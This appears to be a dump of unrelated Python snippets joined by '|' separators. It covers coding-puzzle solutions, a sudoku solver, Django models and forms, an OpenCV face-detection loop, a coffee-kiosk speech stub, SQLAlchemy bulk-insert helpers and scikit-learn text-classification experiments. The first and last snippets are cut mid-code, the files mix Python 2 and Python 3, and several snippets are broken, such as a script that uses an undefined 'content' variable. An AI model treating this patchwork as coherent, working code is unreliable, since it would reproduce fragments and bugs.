:type nums: List[int]
:rtype: int
"""
if nums == []:
return None
ans = 1
prev = nums[ans-1]
while ans != len(nums):
if nums[ans] == prev:
prev = nums[ans]
nums.pop(ans)
else:
prev = nums[ans]
ans += 1
return ans
|
# coding = utf-8
from selenium import webdriver |
class Solution:
def simplifyPath(self, path: str) -> str:
segments = path.split("/")
stack = []
for segment in segments[1:]:
if segment in ("", "."):
continue
elif segment == "..":
if len(stack) > 0:
stack.pop(-1)
else:
stack.append(segment)
return "/" + "/".join(stack)
|
class Read:
"""
An accessor to read a global resource
"""
def __init__(self, class_name):
self.class_name = class_name
class Write:
"""
An accessor to read/write a global resource
"""
def __init__(self, class_name):
self.class_name = class_name
class Entities:
"""
An accessor to read all entities in the world
"""
def __init__(self):
pass
'''
Returns a list of component values with a certain value.
'''
def filter(self, *args):
pass
class System:
"""
A system is a class which modifies a certain set of components each tick of the application
"""
@staticmethod
def data():
pass
def run(self, data):
pass
|
N = 9 # size of the rows and columns
# this is the main function. First it will check if the number is zero or not
# then it will validate the number
# finally it returns true or false
def solve(board):
zero = is_empty(board)
if not zero:
return True
else:
row, col = zero
for i in range(1, 10):
if is_valid(i, row, col, board):
board[row][col] = i
if solve(board):
return True
board[row][col] = 0
return False
# this function simply checks if the number is a 0 or not
def is_empty(board):
for i in range(len(board)):
for j in range(len(board[0])):
if board[i][j] == 0:
return (i, j)
# this is the worker function. It checks all the horizonzal and vertical lines
# to make sure all the number are unique
# then it checks the 3 by 3 box to make sure they are also unique
def is_valid(marker, row, col, board):
for i in range(N):
if board[row][i] == marker and i != col:
return False
for j in range(N):
if board[j][col] == marker and j != row:
return False
# three by three boxes
t_by_t_one = (row//3) * 3
t_by_t_two = (col//3) * 3
# if any of the numbers match it will return false
for i in range(3):
for j in range(3):
r = t_by_t_one + i
c = t_by_t_two + j
if board[r][c] == marker:
return False
return True
# prints our the current board
def printing(arr):
for i in range(N):
for j in range(N):
print(arr[i][j], end = " ")
print()
# this function is what the main will call when it needs to solve the board
def input(board, x):
printing(board)
# if it words it will return a boolean 0 or 1 to trigger the success message
if(solve(board)):
print("-----------------")
printing(board)
print("Solved")
return board, 0
else:
print("-----------------")
print("No Solution")
return board, 1
|
def findCelebrity(self, n):
x = 0
for i in xrange(n):
if knows(x, i): x = i
if any(knows(x, i) for i in xrange(x)):
return -1
if any(not knows(i, x) for i in xrange(n)):
return -1
return x |
from django.db import models
from datetime import datetime
# Create your models here.
class Realtor(models.Model):
name = models.CharField(max_length=200)
photo = models.ImageField(upload_to='photos/%Y/%m/%d')
description = models.TextField(blank=True) # by putting blank True we will not get error if we do not fill it
phone = models.CharField(max_length= 20)
email = models.CharField(max_length= 50)
is_mvp = models.BooleanField(default=False)
hire_date = models.DateTimeField(default=datetime.now , blank= True)
def __str__(self):
return self.name |
import cv2
from threading import Thread
# 多线程,高效读视频
class WebcamVideoStream:
def __init__(self, src, width, height):
# initialize the video camera stream and read the first frame
# from the stream
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
# otherwise, read the next frame from the stream
(self.grabbed, self.frame) = self.stream.read()
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
# 使用方法
cap = WebcamVideoStream(src="d:/xxx.mp4",width=640,height=480).start()
cascade_path = "d:\XML\cuda\haarcascade_frontalface_alt2.xml"
while True:
frame = cap.read()
frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
cascade = cv2.CascadeClassifier(cascade_path)
facerect = cascade.detectMultiScale(frame_gray, scaleFactor=1.3, minNeighbors=5, minSize=(10,10))
for (x,y,w,h) in facerect:
cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,127),5)
font = cv2.FONT_HERSHEY_TRIPLEX
cv2.putText(frame,"Searching .....",(10,100),font,1,(255,255,0),1,False)
imSize = cv2.resize(frame, (800, 640))
cv2.imshow('Opencv',imSize)
k = cv2.waitKey(500)
if k == 27:
break
cap.stop()
cv2.destroyAllWindows() |
from webdev import get_posts
from save import save_to_csv
posts = get_posts()
save_to_csv(posts) |
from .models import Reply, Thread
from django import forms
class CommentForm(forms.ModelForm):
"""
Form to add comment to thread
"""
class Meta:
model = Reply
fields = ['body']
def __init__(self, *args, **kwargs):
"""
Labels removed from body field on comment form
[Code taken from 'https://stackoverflow.com/questions/
11472495/remove-labels-in-a-django-crispy-forms']
Reduced height of body field on comment form
[Code taken from 'https://stackoverflow.com/questions/
38684753/django-reducing-the-size-of-input-box-in-crispy-forms']
"""
super(CommentForm, self).__init__(*args, **kwargs)
self.fields['body'].label = ''
self.fields['body'].widget.attrs.update(style='height: 4.5em')
class ThreadForm(forms.ModelForm):
"""
Form to add thread to forum
"""
class Meta:
model = Thread
fields = ['topic', 'description']
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
for field_name, field in self.fields.items():
field.widget.attrs['class'] = 'border-black rounded-0'
|
from rest_framework import serializers
from .models import Reclamacoes,Categoria
class reclamacoesSerializer(serializers.ModelSerializer):
class Meta:
model = Reclamacoes
fields = ('__all__')
class categoriaSerializer(serializers.ModelSerializer):
class Meta:
model = Categoria
fields = ('__all__')
|
#!/usr/bin/env python
# Funtion:
# Filename:
class Dog(object):
def __init__(self,name, age):
self.name = name
self.age = age
self.__food = 'fish'
@property
def eat(self):
print('{0} is eating {1}'.format(self.name, self.__food))
@eat.setter
def eat(self, food):
print('set to food:', food)
self.__food = food
@eat.deleter
def eat(self):
del self.__food
print('food 变量删除完毕')
@eat.getter
def eat(self):
return self.__food
property
d1 = Dog('bagong', 1)
d1.eat
d1.eat = 'water'
d1.eat
print(d1.eat)
del d1.eat
print('111')
class C(object):
def __init__(self):
self._x = '123'
def getx(self): return self._x
def setx(self, value): self._x = value
def delx(self): del self._x
x = property(getx, setx, delx, "I'm the 'x' property.")
c = C()
c.setx = '222'
a = c.getx
print(a())
|
#!/usr/bin/env python
__author__ = "Blaze Sanders"
__email__ = "blaze@robobev.com"
__company__ = "Robotic Beverage Technologies Inc"
__status__ = "Development"
__date__ = "Late Updated: 2018-04-02"
__doc__ = "Play predefine text using EMIC2 hardware or AWS Polly interface"
# Useful system jazz
import sys, time, traceback, argparse
# Allow control of all keyboard keys
import pynput.keyboard
from pynput.keyboard import Key, Controller
#Pre-recorded .mp3 audio file
HELLO_AUDIO = 1 #"Hello, Is this your first time with us?"
PLACE_AUDIO = 2 #TO-DO:
GOOD_AUDIO = 3 #TO-DO:
COFFEE_AUDIO = 4 #TO-DO:
READY_AUDIO = 5 #TO-DO:
NUMBER_AUDIO = 6 #TO-DO:
NOT_REGISTERED_AUDIO = 7 #TO-DO:
DOWNLOAD_AUDIO = 8 #TO-DO: DELETE?
DEBUG_STATEMENTS_ON = True #Toogle debug statements on and off for this python file
## TO-DO, TO-DO, TO-DO DEBUG print should not be copied and pasted between the emic2 and AWS Polly functions
# @brief Plays predefined text stored on Pi
#
# @param audioClipNum Audio clip to play from speaker
#
# @return NOTHING
def emic2Interface(audioClipNum):
#if GPIO.input(POLLY_LISTEN_PIN) == HIGH:
#print("STARTING WORMY PYTHON GAME. HAVE FUN :)")
#from subprocess import check_call
#check_call("python ~/python_games/wormy.py",shell=True)
if (audioClipNum == HELLO_AUDIO):
if DEBUG_STATEMENTS_ON:
print("Hello, Is this your first time using a BARISTO kiosk? \n\n")
#EMIC2.Say("Hello, Is this your first time with us?")
if (audioClipNum == PLACE_AUDIO):
if DEBUG_STATEMENTS_ON:
print("Place your smart cup on the black pad.")
print("OR")
print("Tell me the last four digits of your phone number. \n\n")
if (audioClipNum == GOOD_AUDIO):
if DEBUG_STATEMENTS_ON:
print("Good morning, Rosie. \n\n")
if (audioClipNum == COFFEE_AUDIO):
if DEBUG_STATEMENTS_ON:
keyboard = Controller()
print("Large caffe mocha with milk coming up \n\n")
for timer in range(10):
keyboard.type(str(abs(10-timer)))
keyboard.type("...")
time.sleep(1)
if (audioClipNum == READY_AUDIO):
if DEBUG_STATEMENTS_ON:
print("Your coffee is ready, Have a great day! \n\n")
if (audioClipNum == NUMBER_AUDIO):
if DEBUG_STATEMENTS_ON:
print("You said your number was 555-555-5555 correct? \n\n")
if (audioClipNum == NOT_REGISTERED_AUDIO):
if DEBUG_STATEMENTS_ON:
print("Your phone number is not registered with BARISTO. \n")
print("Please scan the QR code below to download BARISTO from the Google Play store and register with us. \n\n")
## TO-DO, TO-DO, TO-DO
# @brief Calls into AWS Polly API
#
# @param audioClipNum Audio clip to play from speaker
#
# @return NOTHING
def awsPollyInterface(audioClipNum):
#if GPIO.input(POLLY_LISTEN_PIN) == HIGH:
#print("STARTING WORMY PYTHON GAME. HAVE FUN :)")
#from subprocess import check_call
#check_call("python ~/python_games/wormy.py",shell=True)
if (audioClipNum == HELLO_AUDIO):
if DEBUG_STATEMENTS_ON:
print("Hello, Is this your first time with us?")
#AWS.Polly("Hello, Is this your first time with us?")
if (audioClipNum == PLACE_AUDIO):
if DEBUG_STATEMENTS_ON:
print("Place your smart cup on the black pad.")
print("OR")
print("Tell me the last four digits of your ohone number.")
if (audioClipNum == GOOD_AUDIO):
if DEBUG_STATEMENTS_ON:
print("Good morning, Rosie.")
if (audioClipNum == COFFEE_AUDIO):
if DEBUG_STATEMENTS_ON:
keyboard = Controller()
print("Large caffe mocha with sugar coming up")
for timer in range(10):
keyboard.type(str(abs(10-timer)))
keyboard.type("...")
time.sleep(1)
if (audioClipNum == READY_AUDIO):
if DEBUG_STATEMENTS_ON:
print("Your coffee is ready, Have a great day!")
if (audioClipNum == NUMBER_AUDIO):
if DEBUG_STATEMENTS_ON:
print("You said your number was 555-555-5555 correct?")
if (audioClipNum == NOT_REGISTERED_AUDIO):
if DEBUG_STATEMENTS_ON:
print("Your phone number is not registered with BARISTO.")
print("Please scan the QR code below to download BARISTO from the Google Play store and register with us.")
|
import os
hapus = os.remove("wew.txt")
if True:
print "file dihapus"
|
"""SQLAlchemy core utility functionality
Functionality for faster bulk inserts without using the ORM.
More info: https://docs.sqlalchemy.org/en/latest/faq/performance.html
"""
import logging
import json
import scipy
import numpy as np
import pandas as pd
from sqlalchemy import create_engine
from sqlalchemy.sql import select
from sqlalchemy.orm import scoped_session, sessionmaker
from tqdm import tqdm
from ticclat.ticclat_schema import Wordform, Corpus, Document, \
TextAttestation, Anahash, corpusId_x_documentId
from ticclat.utils import chunk_df, write_json_lines, read_json_lines, \
get_temp_file, iterate_wf, chunk_json_lines, count_lines
LOGGER = logging.getLogger(__name__)
DB_SESSION = scoped_session(sessionmaker())
def get_engine(user, password, dbname,
dburl='mysql://{}:{}@localhost/{}?charset=utf8mb4'):
"""Returns an engine that can be used for fast bulk inserts
"""
engine = create_engine(dburl.format(user, password, dbname), echo=False)
DB_SESSION.remove()
DB_SESSION.configure(bind=engine, autoflush=False, expire_on_commit=False)
return engine
def sql_insert(engine, table_object, to_insert):
"""Insert a list of objects into the database without using a session.
This is a fast way of (mass) inserting objects. However, because no session
is used, no relationships can be added automatically. So, use with care!
This function is a simplified version of test_sqlalchemy_core from here:
https://docs.sqlalchemy.org/en/13/faq/performance.html#i-m-inserting-400-000-rows-with-the-orm-and-it-s-really-slow
Inputs:
engine: SQLAlchemy engine or session
table_object: object representing a table in the database (i.e., one
of the objects from ticclat_schema)
to_insert (list of dicts): list containg dictionary representations of
the objects (rows) to be inserted
"""
engine.execute(table_object.__table__.insert(), to_insert)
def sql_query_batches(engine, query, iterator, total=0, batch_size=10000):
"""
Execute `query` on items in `iterator` in batches.
Take care: no session is used, so relationships can't be added automatically.
Inputs:
total: used for tqdm, since iterator will often be a generator, which
has no predefined length.
"""
with tqdm(total=total, mininterval=2.0) as pbar:
objects = []
for item in iterator:
objects.append(item)
if len(objects) == batch_size:
engine.execute(query, objects)
objects = []
pbar.update(batch_size)
# Doing the insert with an empty list results in adding a row with all
# fields to the default values, or an error, if fields don't have a default
# value. Se, we have to check whether to_add is empty.
if objects != []:
engine.execute(query, objects)
pbar.update(len(objects))
def sql_insert_batches(engine, table_object, iterator, total=0, batch_size=10000):
"""
Insert items in `iterator` in batches into database table.
Take care: no session is used, so relationships can't be added automatically.
Inputs:
table_object: the ticclat_schema object corresponding to the database
table.
total: used for tqdm, since iterator will often be a generator, which
has no predefined length.
"""
with tqdm(total=total, mininterval=2.0) as pbar:
to_add = []
for item in iterator:
to_add.append(item)
if len(to_add) == batch_size:
sql_insert(engine, table_object, to_add)
to_add = []
pbar.update(batch_size)
# Doing the insert with an empty list results in adding a row with all
# fields to the default values, or an error, if fields don't have a default
# value. Se, we have to check whether to_add is empty.
if to_add != []:
sql_insert(engine, table_object, to_add)
pbar.update(len(to_add))
def bulk_add_wordforms_core(engine, iterator, **kwargs):
"""
Insert wordforms in `iterator` in batches into wordforms database table.
Convenience wrapper around `sql_insert_batches` for wordforms.
Take care: no session is used, so relationships can't be added automatically.
"""
sql_insert_batches(engine, Wordform, iterator, **kwargs)
def bulk_add_textattestations_core(engine, iterator, **kwargs):
"""
Insert text attestations in `iterator` in batches into text_attestations database table.
Convenience wrapper around `sql_insert_batches` for text attestations.
Take care: no session is used, so relationships can't be added automatically.
"""
sql_insert_batches(engine, TextAttestation, iterator, **kwargs)
def bulk_add_anahashes_core(engine, iterator, **kwargs):
"""
Insert anahashes in `iterator` in batches into anahashes database table.
Convenience wrapper around `sql_insert_batches` for anagram hashes.
Take care: no session is used, so relationships can't be added automatically.
"""
sql_insert_batches(engine, Anahash, iterator, **kwargs)
def get_tas(corpus, doc_ids, wf_mapping, word_from_tdmatrix_id):
"""
Get term attestation from wordform frequency matrix.
Term attestation records the occurrence and frequency of a word in a given
document.
Inputs:
corpus: the dense corpus term-document matrix, like from
`tokenize.terms_documents_matrix_ticcl_frequency`
doc_ids: list of indices of documents in the term-document matrix
wf_mapping: dictionary mapping wordforms (key) to database wordform_id
word_from_tdmatrix_id: mapping of term-document matrix column index
(key) to wordforms (value)
"""
corpus_coo = scipy.sparse.coo_matrix(corpus)
for tdmatrix_doc_ix, tdmatrix_word_ix, tdmatrix_value in zip(corpus_coo.row, corpus_coo.col, corpus_coo.data):
word = word_from_tdmatrix_id[tdmatrix_word_ix]
freq = tdmatrix_value
yield {'wordform_id': wf_mapping[word],
'document_id': doc_ids[tdmatrix_doc_ix],
'frequency': int(freq)}
def add_corpus_core(session, corpus_matrix, vectorizer, corpus_name,
document_metadata=pd.DataFrame(), batch_size=50000):
"""
Add a corpus to the database.
A corpus is a collection of documents, which is a collection of words.
This function adds all words as wordforms to the database, records their
"attestation" (the fact that they occur in a certain document and with what
frequency), adds the documents they belong to, adds the corpus and adds the
corpus ID to the documents.
Inputs:
session: SQLAlchemy session (e.g. from `dbutils.get_session`)
corpus_matrix: the dense corpus term-document matrix, like from
`tokenize.terms_documents_matrix_ticcl_frequency`
vectorizer: the terms in the term-document matrix, as given by
`tokenize.terms_documents_matrix_ticcl_frequency`
corpus_name: the name of the corpus in the database
document_metadata: see `ticclat_schema.Document` for all the possible
metadata. Make sure the index of this dataframe
matches with the document identifiers in the term-
document matrix, which can be easily achieved by
resetting the index for a Pandas dataframe.
batch_size: batch handling of wordforms to avoid memory issues.
"""
with get_temp_file() as wf_file:
write_json_lines(wf_file, iterate_wf(vectorizer.vocabulary_))
# Prepare the documents to be added to the database
LOGGER.info('Creating document data')
corpus_csr = scipy.sparse.csr_matrix(corpus_matrix)
word_counts = corpus_csr.sum(axis=1) # sum the rows
wc_list = np.array(word_counts).flatten().tolist()
document_metadata['word_count'] = wc_list
# Determine which wordforms in the vocabulary need to be added to the
# database
LOGGER.info('Determine which wordforms need to be added')
with get_temp_file() as wf_to_add_file:
with tqdm(total=count_lines(wf_file)) as pbar:
for chunk in chunk_json_lines(wf_file, batch_size=batch_size):
# Find out which wordwordforms are not yet in the database
wordforms = {wf['wordform'] for wf in chunk}
select_statement = select([Wordform]).where(Wordform.wordform.in_(wordforms))
result = session.execute(select_statement).fetchall()
# wf: (id, wordform, anahash_id, wordform_lowercase)
existing_wfs = {wf[1] for wf in result}
for wordform in wordforms.difference(existing_wfs):
wf_to_add_file.write(json.dumps({'wordform': wordform,
'wordform_lowercase': wordform.lower()}))
wf_to_add_file.write('\n')
pbar.update(batch_size)
# Create the corpus (in a session) and get the ID
LOGGER.info('Creating the corpus')
corpus = Corpus(name=corpus_name)
session.add(corpus)
# add the documents using ORM, because we need to link them to the
# corpus
LOGGER.info('Adding the documents')
for doc in document_metadata.to_dict(orient='records'):
document_obj = Document(**doc)
document_obj.document_corpora.append(corpus)
session.flush()
corpus_id = corpus.corpus_id
# Insert the wordforms that need to be added using SQLAlchemy core (much
# faster than using the ORM)
LOGGER.info('Adding the wordforms')
bulk_add_wordforms_core(session, read_json_lines(wf_to_add_file))
LOGGER.info('Prepare adding the text attestations')
# make a mapping from
df = pd.DataFrame.from_dict(vectorizer.vocabulary_, orient='index')
df = df.reset_index()
LOGGER.info('\tGetting the wordform ids')
wf_mapping = {}
for chunk in chunk_df(df, batch_size=batch_size):
to_select = list(chunk['index'])
select_statement = select([Wordform]).where(Wordform.wordform.in_(to_select))
result = session.execute(select_statement).fetchall()
for wordform in result:
# wordform: (id, wordform, anahash_id, wordform_lowercase)
wf_mapping[wordform[1]] = wordform[0]
LOGGER.info('\tGetting the document ids')
# get doc_ids
select_statement = select([corpusId_x_documentId.join(Corpus).join(Document)]) \
.where(Corpus.corpus_id == corpus_id).order_by(Document.document_id)
result = session.execute(select_statement).fetchall()
# row: (corpus_id, document_id, ...)
doc_ids = [row[1] for row in result]
LOGGER.info('\tReversing the mapping')
# reverse mapping from wordform to id in the terms/document matrix
word_from_tdmatrix_id = dict(zip(vectorizer.vocabulary_.values(),
vectorizer.vocabulary_.keys()))
LOGGER.info('\tGetting the text attestations')
with get_temp_file() as ta_file:
write_json_lines(ta_file, get_tas(corpus_matrix, doc_ids, wf_mapping, word_from_tdmatrix_id))
LOGGER.info('Adding the text attestations')
total = count_lines(ta_file)
bulk_add_textattestations_core(session, read_json_lines(ta_file),
total=total, batch_size=batch_size)
|
import numpy as np
import pandas as pd
import math
import os
import sklearn
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
from sklearn.model_selection import KFold
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn import svm
from sklearn.metrics.pairwise import cosine_similarity
from sklearn.naive_bayes import GaussianNB
from sklearn.linear_model import LogisticRegression
import io
from pdfminer.converter import TextConverter
from pdfminer.pdfinterp import PDFPageInterpreter
from pdfminer.pdfinterp import PDFResourceManager
from pdfminer.pdfpage import PDFPage
import matplotlib.pyplot as plt
from sklearn.ensemble import AdaBoostClassifier
from sklearn.ensemble import RandomForestClassifier
# Get the filenames/paths that we'll be reading
filenames = []
filepaths = []
directory = os.fsencode('./transcripts/')
for fil in os.listdir(directory):
ticker = os.fsdecode(fil)
if ticker != '.DS_Store':
for f in os.listdir(os.fsencode('./transcripts/' + ticker)):
filename = os.fsdecode(f)
path = './transcripts/'+ticker+'/'+filename
filepaths.append(path);
filenames.append(filename)
filepaths
def extract_text_from_pdf(pdf_path):
resource_manager = PDFResourceManager()
fake_file_handle = io.StringIO()
converter = TextConverter(resource_manager, fake_file_handle)
page_interpreter = PDFPageInterpreter(resource_manager, converter)
with open(pdf_path, 'rb') as fh:
for page in PDFPage.get_pages(fh,
caching=True,
check_extractable=True):
page_interpreter.process_page(page)
text = fake_file_handle.getvalue()
# close open handles
converter.close()
fake_file_handle.close()
if text:
return text
def extract_from_folder(filepaths):
documents=[]
print(len(filepaths))
i = 0
for path in filepaths:
file = extract_text_from_pdf(path)
documents.append(file)
i += 1
print(i)
return documents
df = pd.DataFrame({'filename': filenames, 'content': content })
df
# Get the price data files. These files contain the over/under reaction labels that we are using to train
price_filenames = [];
price_filepaths = []
directory = os.fsencode('./prices/')
for fil in os.listdir(directory):
ticker = os.fsdecode(fil)
if ticker != '.DS_Store':
filename = os.fsdecode(ticker)
path = './prices/'+ticker
price_filepaths.append(path);
price_filenames.append(filename)
price_filenames[0].split(' ')[0]
# compile the prices into a single dateframe
mergeddf = pd.DataFrame()
for p in range(len(price_filepaths)):
dfprices = pd.read_csv(price_filepaths[p])
dfprices['date'] = pd.to_datetime(dfprices['date'])
dfprices['filename'] = dfprices['date'].apply(lambda x: x.strftime('%Y%m%d') + ' - ' + price_filenames[p].split(' ')[0])
new_order = [6, 0, 1, 2, 3, 4, 5]
dfprices = dfprices[dfprices.columns[new_order]]
df['filename'] = df['filename'].apply(lambda x: x.split(".")[0])
dfprices['label'] = (dfprices['close'].shift() - dfprices['open'].shift()) > 0
# dfprices
merge = df.merge(dfprices, how='inner', on='filename')
merge['label'] = merge['label'].apply(lambda x: 0 if x == False else 1)
mergeddf = mergeddf.append(merge)
def pdf_to_csv(x):
x = x[:-3]
return x + 'txt'
X = mergeddf['content'].values
y = np.array(mergeddf['label'].tolist())
# count vectorizer tests
# 5-cross-fold validation tests using multiple classifiers with Term Frequency vectors
# (Here is Multinomial Naive Bayes).
kf = KFold(n_splits=5)
kf.get_n_splits(X)
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
for i in range(3):
for j in range(5):
for k in range(2):
for l in range(10):
accuracy = 0
recall = 0
precision = 0
for train_index, test_index in kf.split(X):
# print("TRAIN:", train_index, "TEST:", test_index)
X_train_vector, X_test_vector = X[train_index], X[test_index]
y_train, y_test = y[train_index], y[test_index]
vectorizer = CountVectorizer(input='content',ngram_range=(1,i+1), max_features=5000 + j*5000,stop_words=(None if k==1 else 'english'))
X_train = vectorizer.fit_transform(X_train_vector)
vectorizer = CountVectorizer(input='content',ngram_range=(1,i+1), vocabulary=vectorizer.get_feature_names(), max_features=5000 + j*5000,stop_words=(None if k==1 else 'english'))
X_test = vectorizer.fit_transform(X_test_vector)
clf = MultinomialNB(alpha=0.01 + l*0.01)
clf.fit(X_train, y_train)
pred = clf.predict(X_test)
accuracy += sklearn.metrics.accuracy_score(pred,y_test)/5
recall += sklearn.metrics.recall_score(y_test,pred, average='weighted')/5
precision += sklearn.metrics.precision_score(y_test,pred,average='weighted')/5
print(i,j,k,l,accuracy,recall,precision)
# Term Frequency vs TF-IDF tests for multiple classifiers including AdaBoost, Random Forests,
# Gaussian Naive Bayes
alphas = []
accs = []
accs2 = []
for l in range(1):
accuracy = 0
accuracy_2 = 0
accuracy_svm = 0
accuracy_svm_2 = 0
accuracy_log = 0
accuracy_log_2 = 0
for train_index, test_index in kf.split(X):
# print("TRAIN:", train_index, "TEST:", test_index)
i = 1
j = 4
k = 0
l = 2
X_train_vector, X_test_vector = X[train_index], X[test_index]
y_train, y_test = y[train_index], y[test_index]
vectorizer = CountVectorizer(input='content',ngram_range=(1,i+1), max_features=5000 + j*5000,stop_words=(None if k==1 else 'english'))
X_train = vectorizer.fit_transform(X_train_vector)
vectorizer = CountVectorizer(input='content',ngram_range=(1,i+1), vocabulary=vectorizer.get_feature_names(), max_features=5000 + j*5000,stop_words=(None if k==1 else 'english'))
X_test = vectorizer.fit_transform(X_test_vector)
clf = AdaBoostClassifier(base_estimator=None, n_estimators=100, learning_rate=1.0, algorithm='SAMME.R', random_state=None)
clf.fit(X_train, y_train)
pred = clf.predict(X_test)
accuracy += sklearn.metrics.accuracy_score(pred,y_test)/5
clf = RandomForestClassifier(n_estimators=100, max_depth=2, random_state=0)
clf.fit(X_train, y_train)
pred = clf.predict(X_test)
accuracy_svm += sklearn.metrics.accuracy_score(pred,y_test)/5
clf = GaussianNB()
clf.fit(X_train.toarray(), y_train)
pred = clf.predict(X_test.toarray())
accuracy_log += sklearn.metrics.accuracy_score(pred,y_test)/5
print('tfidf')
vectorizer = TfidfVectorizer(input='content',ngram_range=(1,i+1), max_features=5000 + 5000*j,stop_words=(None if k==1 else 'english'))
X_train = vectorizer.fit_transform(X_train_vector)
vectorizer = TfidfVectorizer(input='content',ngram_range=(1,i+1), vocabulary=vectorizer.get_feature_names(), max_features=5000+5000*j, stop_words=(None if k==1 else 'english'))
X_test = vectorizer.fit_transform(X_test_vector)
clf = AdaBoostClassifier(base_estimator=None, n_estimators=100, learning_rate=1.0, algorithm='SAMME.R', random_state=None)
clf.fit(X_train.toarray(), np.array(y_train).flatten())
pred = clf.predict(X_test.toarray());
accuracy_2 += sklearn.metrics.accuracy_score(pred,y_test)/5
clf = RandomForestClassifier(n_estimators=100, max_depth=2, random_state=0)
clf.fit(X_train, y_train)
pred = clf.predict(X_test)
accuracy_svm_2 += sklearn.metrics.accuracy_score(pred,y_test)/5
clf = GaussianNB()
clf.fit(X_train.toarray(), y_train)
pred = clf.predict(X_test.toarray())
accuracy_log_2 += sklearn.metrics.accuracy_score(pred,y_test)/5
alphas.append(0.01 + l*0.01)
accs.append(accuracy)
accs2.append(accuracy_2)
print(i,j,k,l,accuracy,accuracy_2)
# plt.plot(alphas,accs,'r-o', label='TF')
# plt.plot(alphas,accs2,'b-o', label='TF-IDF')
# plt.title('Accuracies for Alpha: TF vs. TF-IDF')
# plt.legend()
accuracy,accuracy_2,accuracy_svm,accuracy_svm_2,accuracy_log,accuracy_log_2
# plt.plot(n,pageRankScores26,'b-o',label='pageRankScores26')
plt.plot(alphas,accs2,'b-o', label='TF-IDF')
# Some other TF IDF Tests, SVMs
for i in range(4):
for j in range(2):
for k in range(5):
for l in range(1):
accuracy = 0
recall = 0
precision = 0
for train_index, test_index in kf.split(X):
# print("TRAIN:", train_index, "TEST:", test_index)
X_train_vector, X_test_vector = X[train_index], X[test_index]
y_train, y_test = y[train_index], y[test_index]
vectorizer = TfidfVectorizer(input='content',ngram_range=(1,i+1), max_features=5000 + 5000*k,stop_words=(None if j==1 else 'english'))
X_train = vectorizer.fit_transform(X_train_vector)
vectorizer = TfidfVectorizer(input='content',ngram_range=(1,i+1), vocabulary=vectorizer.get_feature_names(), max_features=5000+5000*k,stop_words=(None if j==1 else 'english'))
X_test = vectorizer.fit_transform(X_test_vector)
clf = svm.SVC(C=1+l*10,kernel=cosine_similarity, gamma="auto")
clf.fit(X_train.toarray(), np.array(y_train).flatten())
pred = clf.predict(X_test.toarray());
accuracy += sklearn.metrics.accuracy_score(pred,y_test)/5
recall += sklearn.metrics.recall_score(y_test,pred, average='weighted')/5
precision += sklearn.metrics.precision_score(y_test,pred,average='weighted')/5
# print(i,j,k,l,accuracy,recall,precision)
|
# -*- coding: utf-8 -*-
{
'name': "construction",
'summary': """
Construction Management""",
'description': """
Construction Management Build By Raqmi
""",
'author': "Raqmi",
'website': "http://www.raqmisoultions.com",
'category': 'Construction',
'version': '0.1',
'depends': ['dash_view', 'map_view', 'sale',
'project',
'hr_timesheet',
'hr_contract_type',
'sale_timesheet',
'purchase',
'note',
'stock',
'stock_account',
'material_purchase_requisitions',
'account',
'analytic',
'account_asset',
'stock',
'crm'],
'data': [
'security/construction_security.xml',
'security/ir.model.access.csv',
'data/data.xml',
'data/task_sequence.xml',
'views/assets.xml',
'wizard/project_user_subtask_view.xml',
'wizard/task_costing_invoice_wiz.xml',
'views/task_cost_view.xml',
'views/project.xml',
'views/construction_management_view.xml',
'views/note_view.xml',
'views/project_task_view.xml',
'views/project_view_construct.xml',
'views/purchase_view.xml',
'report/report_note_view.xml',
'views/accounting_view.xml',
'views/estimated_sheet.xml',
'views/project_boq.xml',
'views/crm_view.xml',
'wizard/whatsapp_wizard.xml',
'views/menu.xml'
],
}
|
n = input("Введите число\n")
number = 1
while int(n) > number:
print(number)
number = number*2 |
from sys import stdin
input = stdin.readline
'''
1. dp_t를 적당히 잡고
2. dp_t 초기값을 잡고
3. 규칙성을 찾아서 쭈루루룩
'''
n = int(input().rstrip())
days_costs = [tuple(map(int, input().rstrip().split())) for _ in range(n)]
dp_t = [0]*(n+1) # 0~n-1로 적용할 예정이지만, 마지막날을 위해 한칸 더 선언
for i in range(n-1, -1, -1): # 거꾸로 계산
day, cost = days_costs[i]
if i + day > n: # 기한 안에 못할 일이면 스킵
dp_t[i] = dp_t[i+1] # 아....
continue
dp_t[i] = max(dp_t[i+1], dp_t[i+day] + cost)
print(dp_t[0])
|
nums = [3,2,4]
target = 6
ret =[]
l = nums.__len__()
for i in range(0, l):
for j in range(i+1, l):
if (nums[i]+nums[j]) == target:
ret.append(i)
ret.append(j)
break
print ret
|
from sklearn.ensemble import AdaBoostClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import roc_curve, auc, precision_score, recall_score, f1_score
from sklearn import grid_search, svm, preprocessing
from classification_table import classification_table
import pylab as pl
class FitModels(object):
def __init__(self, x_train, x_test, y_train, y_test, data_name):
self.x_train = x_train
self.x_test = x_test
self.y_train = y_train
self.y_test = y_test
self.data_name = data_name
def run_svm(self):
svm_params = {'C': [2**-4, 2**-3, 2**-2, 2**-1, 2**0,
2**1, 2**2, 2**3, 2**4],
'gamma': [0, 2**-4, 2**-3, 2**-2, 2**-1, 2**0,
2**1, 2**2, 2**3, 2**4],
'kernel': ['linear', 'rbf'],
'class_weight': ['auto', None]}
clf = svm.SVC(probability=True)
model = grid_search.GridSearchCV(clf, svm_params, n_jobs=3, cv=5)
print 'Fitting model...'
model.fit(self.x_train, self.y_train)
print 'SVM best estimator: {}'.format(model.best_estimator_)
print 'SVM gridsearchCV scores: {}'.format(model.grid_scores_)
